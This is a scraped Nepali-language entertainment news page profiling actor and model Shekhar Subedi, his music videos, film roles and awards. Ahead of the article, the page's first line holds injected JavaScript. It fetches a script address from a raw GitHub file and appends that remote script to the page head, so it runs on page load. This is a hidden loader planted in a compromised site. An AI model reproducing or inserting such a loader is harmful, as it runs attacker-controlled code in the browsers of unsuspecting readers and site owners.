;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); शेखर सुवेदीको फोटोसुटबाट सुरु भएको यात्रा फिल्मी पर्दाको नायक सम्म – जुनेली न्युज
बुधबार, साउन २, २०८२
  • होमपेज
  • शेखर सुवेदीको फोटोसुटबाट सुरु भएको यात्रा फिल्मी पर्दाको नायक सम्म
Breaking News

शेखर सुवेदीको फोटोसुटबाट सुरु भएको यात्रा फिल्मी पर्दाको नायक सम्म

जुनेली न्युज, काठमाडौँ |

१० वर्ष अघि ‘फेसन डिजाइनिङ क्लोदिङ ब्राण्ड’बाट मोडलिङ क्षेत्रमा प्रवेश गरेका कलाकार शेखर सुवेदी अहिले ठूलो पर्दाका चलचित्रमा चरित्र नायकको रुपमा जमिसकेका छन् ।

सुवेदी कलाक्षेत्रमा विशेष पात्रको भुमिकामा अभिनय गर्न रुचाउँछन् । विशेष गरि पौराणिक, ऐतिहासिक पात्रका रुपमा उनका फोटोसुट र अभिनय विशेष गरि रुचाइएका छन् ।

सामान्य पारिवारिक पृष्ठभुमिबाट मोडलिङ र चलचित्र क्षेत्रमा लागेका सुवेदी अब्बल चरित्र अभिनयकै कारण चलचित्र र मोडलिङ क्षेत्रमा जमेका छन् । २८ वर्षका कलाकार सुवेदीले १० वर्षको कलायात्रामा 60 वटा म्युजिक भिडियो, १० वटा फिल्ममा आफ्नो दमदार चरित्र नायकको अभिनय गरिसकेका छन् ।

दक्षिण भारतीय फिल्ममा सपोर्टिभ आर्टिष्टको अभिनय समेत गरेका सुवेदीले थुप्रै मोडलिङ इभेण्ट, शोमा आफ्नो प्रस्तुती दिनुका साथै जजको भूमिका निर्वाह गरेका छन् । ।

सुवेदीले चारवटा चलचित्रमा खलपात्रको भुमिकामा अभिनय गरेका छन् ।

उनले “पहिलो यो माया” म्युजिक भिडियोमा राजाको प्रेम चरित्रको, गायिका मेलिना राईको गीत “नियाली हेर आँखामा मेरो”को म्युजिक भिडियोमा राजाको प्रेम कहानीमा अभिनय गरेका छन् ।

“कर्मको पासो” म्युजिक भिडियोमा यमराजको पात्रको भुमिकामा अभिनय गरेका छन् भनें सुवेदीले अभिनय गरेका 50 वटा म्युजिक भिडियोमा विशेष चर्चामा रहेको छ भने उनले हिन्दी म्युजिक भिडियो गीत “यह नदियाँ”मा पनि अभिनय गरेका छन् ।

शेखर सुवेदीले कला यात्रामा विभिन्न सम्मान तथा अवार्ड प्राप्त गरेका छन् । ‘मिस्टर पपुलर अफ नेपाल २०१६’ को मोडलिङ प्रतियोगिताको विजेता समेत रहेका सुवेदीको पौराणिक पात्र, चरित्रमा भएको फोटोसुट तस्विर रसियाको “मारिका” (Marika) म्यागाजिन (२०२२ सेप्टेम्बर ७), वासिङटनको “कताना” (Katana) (जुन २०२२) मा प्रकाशित भएको थियो ।

भारतको पञ्जाव र गुजरातको लोकप्रिय पत्रिकामा, विहारको ‘दर्शन’ र ‘डिजायर न्युज’मा समेत सुेवेदीको चरित्र अभिनयका बारेमा छापिएको थियो ।

कलायात्रालाई नै जीवनको मुख्य लक्ष्य बनाएका सुवेदी भन्छन्– “शुरु शुरुमा फिल्म क्षेत्रमा भूमिका पाउन गाह्रो भए पनि अहिले चरित्र नायकका रुपमा काम र सम्मान दुबै पाएको छुँ । चरित्र नायकको मेरो अभिनय धेरै रुचाइएको छ । नेपालको ऐतिहासिक, सांस्कृतिक, पौराणीक पात्रका माध्यमबाट विश्व रंगमञ्चलाई नेपालले पनि धेरै दिन सक्छ भन्ने लागेको छ ।”

हालसालै उनलाई तिनवटा चलचीत्रमा अभिनय गर्ने प्रस्ताव आएको छ भने दुई फिल्म चाडैंनै फ्लोरमा जाने बताएका छन् ।

फेसबुक प्रतिक्रियाहरु